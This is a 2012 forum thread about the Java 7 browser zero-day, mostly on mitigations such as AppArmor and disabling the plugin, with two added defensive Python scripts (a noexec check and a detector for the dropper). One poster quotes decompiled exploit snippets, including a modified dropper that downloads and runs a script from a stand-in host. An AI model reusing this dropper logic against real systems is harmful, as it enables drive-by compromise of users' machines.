Java 7 0-day

KodiacZiller: The newly discovered Java 7 0-day works on Linux (at least on the default install of Ubuntu 12.04). Tested it earlier with a VM and Metasploit. It works on both Firefox and Chromium (it bypasses the Chromium chroot sandbox, though I am not sure if Chromium sandboxes Java in the first place). However, I don't *think* it works with OpenJDK. At any rate, if you are using Oracle's official Java 7 in your browser, you can be compromised by merely visiting a malicious page (no user interaction required). Luckily, at least for Ubuntu users, Oracle's Java is not in the repos. You must install from a PPA.
I also tested it against the AppArmor profile that comes with Ubuntu and AppArmor killed it cold, so I highly recommend using AppArmor, SELinux or Grsec on a desktop box, at least for the browser. Unfortunately, Ubuntu no longer comes with the AppArmor profile enabled by default, so you have to do it yourself (and make a few tweaks to the profile).
And NX/ASLR/RELRO do not stop it, since it doesn't work via memory corruption. It works on both 32- and 64-bit as well.
Since it may be a while before this is patched by Oracle, I thought I would give a heads up, especially since it is already in Metasploit. Obviously this means the script-kiddies will be running wild with it in no time.
The exploit doesn't get root, but that's not needed to connect to a remote server without one's knowledge.
It affects Mac and Windows users too, of course.
-- Getting people to stop using Windows is more or less the same as trying to get people to stop smoking tobacco products. They don't want to change; they are happy with slowly dying inside. -- munky99999
JohnInSJ (San Jose, CA): I've not seen a good description of what this does give you - access at the current user level for the login session that's running? What about firewalls?
-- My place : »www.schettino.us
timcuth (Pelham, AL), replying to KodiacZiller: Is there a way to prevent Java from executing without completely uninstalling it?
Is it just the Java programming language, or JavaScript, too? If it includes JavaScript, it will break most web pages.
What are the current (as of right now, for this exploit) best practices for protection?
-- "Life is like this long line, except at the end there ain't no merry-go-round." - Arthur on The King of Queens ~ Project Hope ~
KodiacZiller: said by timcuth: Is there a way to prevent Java from executing without completely uninstalling it?
Not really, unless you disable the plugin in the browser. Or you can, as I said above, use a MAC system like AppArmor or SELinux. Java 6 is not affected, so that might be an option.
said by timcuth: Is it just the Java programming language, or JavaScript, too? If it includes JavaScript, it will break most web pages.
AFAIK it is just Java.
said by timcuth: What are the current (as of right now, for this exploit) best practices for protection?
Either disable Java in the browser or confine it with a MAC.
Of course, the chances of Linux being targeted are small, but still possible.
timcuth (Pelham, AL): said by KodiacZiller: Of course, the chances of Linux being targeted are small, but still possible.
Thanks for your answers.
Java is cross-platform, so I doubt it will make any difference to the exploit what host system is running.
Tim
Maxo (Tallahassee, FL), replying to timcuth: said by timcuth: Is it just the Java programming language, or JavaScript, too? If it includes JavaScript, it will break most web pages.
Java and JavaScript are common in name only.
howardfine, replying to KodiacZiller: »www.theregister.co.uk/2012/08/27···exploit/
quote: In the form in which it was discovered, the exploit only works on Windows machines, because the payload that it downloads is a Windows executable. But the hackers behind the Metasploit penetration testing software say they have studied the exploit and found that it could just as easily be used to attack machines running Linux or Mac OS X, given the appropriate payload.
Which means no method has been found that involves Linux or Mac.
KodiacZiller: said by howardfine: http://www.theregister.co.uk/2012/08/27/disable_java_to_block_exploit/ quote: In the form in which it was discovered, the exploit only works on Windows machines, because the payload that it downloads is a Windows executable. But the hackers behind the Metasploit penetration testing software say they have studied the exploit and found that it could just as easily be used to attack machines running Linux or Mac OS X, given the appropriate payload. Which means no method has been found that involves Linux or Mac.
Yeah, from my testing, the Metasploit exploit downloads a .exe to /tmp and then tries to execute it. Obviously a .exe won't run on a *nix box, but as the article points out, it would be trivial to change the payload to something *nix specific (like a shell script, for instance).
You could always mount /tmp noexec, but that requires /tmp to be on its own partition. Also, doing this will break a lot of apps.
The best option is to use Java 6, disable Java altogether in the browser, or lock the browser down with a MAC system.
EDIT: Also, it appears OpenJDK (IcedTea) is not affected, so most Linux users are probably safe, since most don't use Oracle's official Java anyway. Ubuntu took Oracle's Java out of its repositories a while back, and now OpenJDK is what is installed.
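The /tmp noexec option mentioned above, as an added example (editor's code, not from the thread): a Python check of whether a given path sits on a noexec mount, using the same longest-prefix rule the kernel applies when it resolves a path to its mount. The /proc/mounts text is a constructed sample so the check runs offline; check_live() reads the real file on a Linux box. java.io.tmpdir defaults to /tmp on Linux, so that is the directory checked.

```python
"""Is the directory the dropper writes into (java.io.tmpdir, /tmp by
default on Linux) on a mount with the noexec option?

Added example, not code from the thread.  The mount table is matched by
longest mount-point prefix, which is also what the kernel does, so a
/tmp that is not its own mount correctly inherits the root filesystem's
options (and is then not noexec).
"""
import os

# Constructed sample of /proc/mounts: /tmp is its own tmpfs with noexec,
# /home is a plain ext4 mount without it.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda2 /home ext4 rw,relatime 0 0
"""


def parse_mounts(text):
    """Return [(mount_point, {options})] from text in /proc/mounts format."""
    mounts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        # /proc/mounts escapes spaces in mount points as the octal \040.
        mount_point = fields[1].replace("\\040", " ")
        mounts.append((mount_point, set(fields[3].split(","))))
    return mounts


def mount_for(path, mounts):
    """Longest mount point that contains path, as (mount_point, options), or None."""
    path = os.path.normpath(path)
    best = None
    for mp, opts in mounts:
        if mp == "/" or path == mp or path.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best[0]):
                best = (mp, opts)
    return best


def is_noexec(path, mounts_text=SAMPLE_MOUNTS):
    """True if execve() of a file at path would be refused (EACCES) by noexec."""
    hit = mount_for(path, parse_mounts(mounts_text))
    return hit is not None and "noexec" in hit[1]


def check_live(tmpdir="/tmp"):
    """Check the running system (Linux only); returns None where /proc/mounts is absent."""
    try:
        with open("/proc/mounts") as fh:
            text = fh.read()
    except OSError:
        return None
    return is_noexec(tmpdir, text)


if __name__ == "__main__":
    print("sample: /tmp/update.exe on noexec mount:", is_noexec("/tmp/update.exe"))
    print("live:   java.io.tmpdir (/tmp) on noexec mount:", check_live())
```

noexec only makes the kernel refuse execve() of the dropped file, i.e. the dropper's direct exec() of update.exe fails. The same applet can instead run sh or perl with /tmp/update.exe as an argument, because the interpreter merely reads the file, so noexec raises the bar without closing the hole, on top of breaking installers that unpack into /tmp as the post notes.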
said by KodiacZiller: Obviously a .exe won't run on a *nix box
EEEEK! Halten Sie!
»www.winehq.org/
... the effects of which...
are unknown...
howardfine, replying to KodiacZiller: said by KodiacZiller: it would be trivial to change the payload to something *nix specific (like a shell script for instance).
But how would that be executed without permissions?
@BBBanditRuR - Same answer. That was created with the Windows ABI and can't run on a *nix machine no matter how hard one tries.
JohnInSJ (San Jose, CA), replying to KodiacZiller: said by KodiacZiller: Yeah, from my testing, the Metasploit exploit downloads a .exe to /tmp and then tries to execute it.
Which would run as the current user, even under Windows - which should (if the user isn't running as Admin, or hasn't disabled UAC) raise all sorts of alarms if it does something needing permissions.
Replying to howardfine: My point is that while it may not affect the running system, malicious software *could* run on it.
FF4m3, replying to KodiacZiller: Years ago I found it possible to eliminate Java from all my used OSes by switching to apps that don't require Java. So all related issues became forever nonexistent.
Naturally not everyone is able to do this but, if possible, it offers a permanent solution.
Maxo (Tallahassee, FL): said by FF4m3: Naturally not everyone is able to do this but, if possible, it offers a permanent solution.
I've been able to get rid of Sun Java on all but my work machine. I use SQL Developer for my database work. It runs horribly slow under OpenJDK/IcedTea.
InTheKnow, replying to howardfine:
Here is a snippet from the actual exploit code; those who are saying it fails to run on Linux are talking out their ass. It has Windows detection and calls chmod on a non-Windows box. The xiaomaolv parameter defines the first-stage payload and could point to a shell script, an ELF binary, etc. Folks, we run stuff in user-space; when your local user is owned, and it's the primary user you use to interface with the system, tell me again how this isn't a security concern? I'd prefer someone not snarf my ~/

    if(bn.indexOf(k1) == 0 && si.indexOf(k2) == 0 && bs.intValue() == 748)
    {
        // drop the first-stage payload as <java.io.tmpdir>/update.exe
        Object localObject1 = (new StringBuilder(String.valueOf(System.getProperty("java.io.tmpdir")))).append(File.separator).append("update.exe").toString();
        downFile((String)localObject1, xiaomaolv);
        // str1 is System.getProperty("os.name"): on anything that is not Windows, make the file executable first
        if(str1.indexOf("Windows") < 0)
            exec((new StringBuilder("chmod 755 ")).append((String)localObject1).toString());
        exec((String)localObject1);
        (new File((String)localObject1)).delete();
    }

Of course we could keep saying it doesn't work, right? »www.youtube.com/watch?v=Ri_Uny-ZwYk
howardfine: said by InTheKnow: Here is a snippet from the actual exploit code; those who are saying it fails to run on Linux are talking out their ass.
Well, the article says it only has a Windows executable in it. There is another article around that says the same thing. I don't have time to mess with your code, but how you are getting a Windows executable to run in Linux without permissions would be...unusual...to put it mildly. Not to mention doing so as non-root.
EDIT: I missed that you are talking about running a script and not the executable from the malware, but the same question comes about. You are saying you are able to download and execute this script as a non-root user, which is highly questionable.
JohnInSJ (San Jose, CA): I think he's saying he can download a script, chmod +x it, and run it as the current user. Which isn't exactly owning the box just yet. Next would be that the payload would execute a local root elevation (assuming you're not patched against the script-kiddie list of exploits attempted in the payload).
So to recap, you must be 1) dumb enough to run Java in your browser (hey, it's 1998!), 2) running as root (OMG, like totally), 3) running a system with known root elevation exploits, or 4) l33t haxxors have you.
That seems right to me.
I think most Linux users are going to be failing at 1. I think anyone with a brain should be failing at 1.
Replying to howardfine:
Respectfully, yes, you can run the script as a non-root user, programmatically, just as any local user can, or a binary. Two lines of code and it can be made cross-platform. I think folks are confusing the necessity of root access to "own" the system. I think we're arguing semantics here; unauthorized execution of code, even in the context of a local unprivileged user, is still "owning". If anything, owning the system as the local logged-in user gives them access to the encrypted data stores typically unencrypted during login like ecryptfs/luks. Consider the below code; wee, look, it's cross-platform:

    if(xiaomaolv == null && bn == null)
        return null;
    try
    {
        String k1 = "woyouyizhixiaomaol";
        String k2 = "conglaiyebuqi";
        String str1 = System.getProperty("os.name");
        if(bn.indexOf(k1) == 0 && si.indexOf(k2) == 0 && bs.intValue() == 748)
        {
            Object localObject1 = (new StringBuilder(String.valueOf(System.getProperty("java.io.tmpdir")))).append(File.separator).append("update.exe").toString();
            downFile((String)localObject1, xiaomaolv);
            if(str1.indexOf("Windows") < 0){
                //Wee look at me, I affect not just Windows!!
                (new File((String)localObject1)).delete();
                downFile((String)localObject1, "http://www.example.com/hostile_stuff.sh");
                exec((new StringBuilder("chmod 755 ")).append((String)localObject1).toString());
            }
            exec((String)localObject1);
            (new File((String)localObject1)).delete();
        }
    }
    catch(Exception exception) { }
    return null;

These are just code snippets; I'm not going to post the whole decompiled jar/class files. Let me say the assertions of:
1) People shouldn't run Java -- I'm sorry, this is asinine. Java is security horrid, but there are enterprise applications that explicitly require it, such as Juniper's VPN client on Linux. QuickJava is a pretty good answer for a Firefox plugin.
2) Running as root; yeah, they should be flogged.
3-4) A simple wget script, running in a loop, backgrounded, makes a pretty damned good resource exhaustion attack for a bot-peer. C'mon guys, we see this crap already with the SSH scans and ownage of various unpatched web-apps on LAMP boxes. Connect-back shells, complex bot-peer Perl code, stripped ELFs, etc. You don't need root to bind an unpriv socket. Let's not be too dismissive of reality.
As of now, even for Linux folks, it seems 1.6.0_u34 is the best answer, or even better is OpenJDK IF it works with the enterprise applications. I'm half tempted to set up a POC that fork-bombs folks who haven't set up limits.conf for nproc, just as a POC to demonstrate that indeed, Virginia, there is a security concern here.
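The dropper's observable behaviour on a non-Windows host, going by the decompiled snippets in this thread, is a JVM process spawning chmod 755 on a file under java.io.tmpdir and then executing that file (or, as the noexec discussion earlier implies, handing it to sh instead). Here is an added hunting example, editor's code rather than anything from the thread, that looks for exactly that parent/child pattern in process-creation events. The event lines are a constructed, simplified format (epoch, pid, ppid, parent command name, executable, argv), not auditd's real record syntax, so the parser is the part to swap for your own source. The parent command name keyed on is java, on the assumption that the Oracle plugin runs applets in a separate java process launched by the browser's plugin host; adjust JVM_COMMS if your environment differs.

```python
"""Hunt for the Java-dropper pattern: a JVM child process does
`chmod 755 <tmpdir>/file`, then <tmpdir>/file is executed (or an
interpreter is pointed at it).

Added example, not code from the thread.  SAMPLE_EVENTS is a constructed
process-creation log in a simplified format of this example's own:
    <epoch> <pid> <ppid> <parent comm> <exe> <argv...>
Replace parse_events() to read auditd EXECVE/SYSCALL records or whatever
your telemetry produces; the detection logic is independent of it.
"""
import shlex

TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Assumption: the applet runs in a separate `java` process spawned by the
# browser plugin host, so Runtime.exec() children have a parent comm of java.
JVM_COMMS = {"java"}
# Interpreters that will happily run a file from a noexec mount.
INTERPRETERS = {"sh", "bash", "dash", "perl", "python", "python2", "python3"}

# Constructed sample: the dropper sequence (pid 4101 is the applet's JVM),
# some unrelated activity, and the interpreter variant of the same attack.
SAMPLE_EVENTS = """\
1346112000 4120 4101 java /bin/chmod chmod 755 /tmp/update.exe
1346112001 4121 4101 java /tmp/update.exe /tmp/update.exe
1346112005 4130 2001 bash /usr/bin/vim vim /tmp/notes.txt
1346112010 4140 3010 java /usr/bin/git git status
1346112020 4150 4101 java /bin/sh sh /tmp/stage2.sh
"""


def in_tmp(path):
    """True for paths under a world-writable temp directory."""
    return any(path.startswith(d) for d in TMP_DIRS)


def parse_events(text):
    """Parse the constructed event format into dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(None, 5)
        if len(fields) < 5:
            continue
        rest = fields[5] if len(fields) > 5 else ""
        events.append({"ts": int(fields[0]), "pid": int(fields[1]),
                       "ppid": int(fields[2]), "pcomm": fields[3],
                       "exe": fields[4], "argv": shlex.split(rest)})
    return events


def find_dropper_sequences(events, window=30):
    """Return findings for JVM children that chmod and/or run temp-dir files.

    severity "high": the same JVM chmod'ed the file within `window` seconds
    before executing it (the full dropper sequence).  "medium": a JVM ran a
    temp-dir file without a preceding chmod, or fed one to an interpreter.
    """
    findings = []
    chmodded = {}  # (ppid, path) -> time of the chmod
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["pcomm"] not in JVM_COMMS:
            continue
        argv = ev["argv"]
        exe_base = ev["exe"].rsplit("/", 1)[-1]
        # Non-Windows branch of the dropper: chmod on the downloaded file.
        if exe_base == "chmod" and len(argv) >= 3 and in_tmp(argv[-1]):
            chmodded[(ev["ppid"], argv[-1])] = ev["ts"]
            continue
        # The exec() step: the dropped file itself is the executable.
        if in_tmp(ev["exe"]):
            t0 = chmodded.get((ev["ppid"], ev["exe"]))
            sev = "high" if t0 is not None and ev["ts"] - t0 <= window else "medium"
            findings.append({"severity": sev, "ppid": ev["ppid"],
                             "path": ev["exe"], "reason": "jvm-exec-from-tmp"})
            continue
        # The noexec-proof variant: an interpreter pointed at a temp-dir file.
        if exe_base in INTERPRETERS:
            for arg in argv[1:]:
                if in_tmp(arg):
                    findings.append({"severity": "medium", "ppid": ev["ppid"],
                                     "path": arg, "reason": "jvm-interpreter-on-tmp-file"})
                    break
    return findings


if __name__ == "__main__":
    for f in find_dropper_sequences(parse_events(SAMPLE_EVENTS)):
        print(f)
```

Keying on the parent's command name rather than the child's keeps the rule from firing on every chmod on the box; the chmod-then-exec correlation is what separates the dropper from a developer running a build script out of /tmp.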
Maxo (Tallahassee, FL), replying to KodiacZiller: For those who may not know, I think it is important to note that this does not work by just having Java on your system. It must also be a browser plugin. You can install Java without giving your browser access to run it as a plugin.
Snakeoil (Mentor, OH), replying to KodiacZiller: How does it work with Minecraft?